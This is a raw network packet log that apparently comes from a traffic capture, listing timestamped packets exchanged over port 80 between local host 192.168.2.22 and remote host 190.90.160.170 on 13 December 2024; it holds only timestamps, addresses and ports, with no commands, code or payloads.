                          Dec 13, 2024 17:54:40.987225056 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.990294933 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.990362883 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.990364075 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.990402937 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.993406057 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.993468046 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.993547916 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.993590117 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.996556997 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.996607065 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:40.996642113 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:40.996685028 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.040213108 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.040302992 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.040324926 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.040365934 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.041940928 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.041986942 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.041989088 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.042026043 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.045094967 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.045149088 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.045183897 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.045202971 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.048660994 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.048746109 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.048753977 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.048780918 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.053035021 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.053127050 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.053184032 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.053225040 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.056807995 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.056873083 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.056969881 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.057018042 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.110976934 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.111084938 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.111180067 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.111721039 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.111754894 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.111773014 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.111778975 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.111819983 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.114284992 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.114351988 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.114368916 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.114422083 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.116489887 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.116591930 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.116620064 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.116677046 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.119052887 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.119113922 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.119179964 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.119219065 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.121666908 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.121741056 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.121745110 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.121795893 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.124108076 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.124183893 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.124201059 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.124238968 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.126487017 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.126545906 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.126616001 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.126653910 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.128855944 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.128940105 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.128948927 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.128987074 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.132014036 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.132086992 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.132606983 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.132662058 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.134107113 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.134130001 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.134166002 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.134176016 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.136957884 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.136984110 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.137038946 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.137139082 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.138864040 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.138928890 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.139014959 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.139106035 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.141072989 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.141113043 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.141153097 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.141177893 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.143465042 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.143551111 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.143598080 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.143640995 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.145870924 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.145942926 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.146009922 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.146049023 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.148010015 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.148072958 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.148147106 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.148179054 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.150492907 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.150552034 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.150623083 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.150664091 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.152820110 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.152883053 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.152923107 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.152965069 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.155209064 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.503578901 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.503622055 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.504540920 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.504590988 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.504674911 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.504720926 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.505533934 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.505582094 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.505624056 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.505666971 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.506464005 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.506510973 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.506587029 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.506629944 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.507430077 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.507474899 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.507553101 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.507622004 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.508451939 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.508503914 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.508538008 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.508601904 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.509510994 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.509562969 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.509598017 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.509644985 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.510706902 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.510756969 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.510775089 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.510819912 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.511434078 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.511478901 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.511542082 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.511589050 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.512384892 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.512444019 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.512490988 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.512536049 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.513789892 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.513849974 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.513916016 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.513962984 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.515036106 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.515088081 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.515224934 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.515263081 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.516165972 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.516218901 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.516262054 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.516299963 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.517138958 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.517193079 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.517266035 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.517306089 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.518182039 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.518228054 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.518234015 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.518300056 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.519159079 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.519305944 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.519305944 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.519454956 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.520028114 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.520127058 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.520147085 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.520211935 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.520755053 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.520798922 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.520833015 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.520875931 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.521547079 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.521598101 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.521636963 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.521681070 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.522351980 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.522397995 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.522418976 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.522433996 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.523273945 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.523324013 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.523382902 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.523427010 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.524282932 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.524324894 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.524358034 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.524396896 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.525288105 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.525347948 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.525460005 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.525505066 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.526216984 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.526267052 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.526319981 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.526365042 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.527267933 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.527337074 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.527360916 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.527417898 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.528311968 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.528378963 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.528419018 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.528470039 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.529185057 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.529227018 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.529258013 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.529320955 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.530261993 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.530312061 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.530375957 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.530420065 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.531156063 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.531205893 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.531285048 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.531366110 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.532226086 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.532270908 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.532413960 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.532459974 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.533181906 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.533272028 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.533380985 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.533432961 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.534193039 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.534238100 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.534281015 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.534320116 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.535177946 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.535398006 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.535511971 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.535545111 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.536128044 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.536185026 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.536211967 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.536242962 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.537228107 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.537264109 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.537277937 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.537302971 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.538106918 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.538146973 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.538248062 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.538573980 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.539226055 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.539273024 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.539366961 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.539403915 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.540062904 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.540102959 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.540252924 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.540293932 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.541057110 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.541094065 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.541135073 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.541168928 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.542063951 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.542102098 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.542146921 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.542186022 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.543013096 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.543054104 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.543081999 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.543118000 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.544001102 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.544039011 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.544141054 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.544176102 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.545058012 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.545098066 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.545144081 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.545177937 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.546013117 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.546061993 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.688085079 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.688178062 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.688268900 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.688270092 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.688451052 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.688499928 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.688596964 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.688641071 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.689496040 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.689544916 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.689583063 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.689629078 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.690471888 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.690521955 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.690571070 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.690613985 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.691446066 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.691498041 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.691572905 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.691618919 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.692461967 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.692509890 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.692574024 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.692615032 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.693447113 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.693496943 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.693547010 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.693591118 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.694421053 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.694473028 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.694529057 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.694572926 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.695544958 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.695594072 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.695712090 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.695756912 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.696640968 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.696690083 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.696697950 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.696742058 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.697618961 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.697673082 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.697716951 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.697761059 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.698437929 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.698494911 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.698517084 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.698592901 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.699477911 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.699532986 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.699598074 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.699626923 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.700361013 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.700421095 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.700490952 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.700536966 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.701311111 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.701361895 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.701364040 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.701406002 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.702339888 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.702389002 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.702414036 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.702452898 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.703372955 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.703423023 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.703471899 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.703520060 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.704345942 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.704400063 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.704449892 CET8049161190.90.160.170192.168.2.22
